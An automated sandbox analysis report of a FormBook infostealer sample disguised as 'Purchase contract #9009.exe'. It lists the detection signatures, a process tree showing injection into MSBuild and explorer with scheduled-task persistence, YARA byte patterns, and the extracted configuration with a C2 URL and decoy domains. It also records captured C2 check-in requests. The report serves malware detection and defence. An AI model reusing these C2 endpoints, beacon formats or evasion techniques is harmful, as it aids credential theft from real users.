Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase contract #9009.exe

Overview

General Information

Sample Name:Purchase contract #9009.exe
Analysis ID:458959
MD5:acff75235867dd82b2679b4afd3ad525
SHA1:072839587fc2c193afd5963c467502be89815c2a
SHA256:84f6beeecfc24544df0a59c7b7f0961c44d835f95f23289dac5730decc2d4957
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase contract #9009.exe (PID: 6948 cmdline: 'C:\Users\user\Desktop\Purchase contract #9009.exe' MD5: ACFF75235867DD82B2679B4AFD3AD525)
    • schtasks.exe (PID: 7128 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 3844 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1572 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4112 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.MSBuild.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        4.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase contract #9009.exe' , ParentImage: C:\Users\user\Desktop\Purchase contract #9009.exe, ParentProcessId: 6948, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 3844

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exeReversingLabs: Detection: 36%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase contract #9009.exeVirustotal: Detection: 25%Perma Link
          Source: Purchase contract #9009.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Purchase contract #9009.exeJoe Sandbox ML: detected
          Source: 4.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Purchase contract #9009.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Purchase contract #9009.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
          Source: Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.narrowpathwc.com/n8ba/
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.lifestylebykendra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.ascope.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.5fashionfix.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.mtsnurulislamsby.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.wintonplaceoh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.backtothesimplethings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 95.215.210.10 95.215.210.10
          Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
          Source: Joe Sandbox ViewASN Name: NEWIT-ASRU NEWIT-ASRU
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: WEEBLYUS WEEBLYUS
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.lifestylebykendra.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.ascope.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.5fashionfix.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.mtsnurulislamsby.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.wintonplaceoh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1Host: www.backtothesimplethings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.narrowpathwc.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Tue, 03 Aug 2021 20:58:18 GMTServer: ApacheX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://domain.idwebhosting.net/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderid=
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
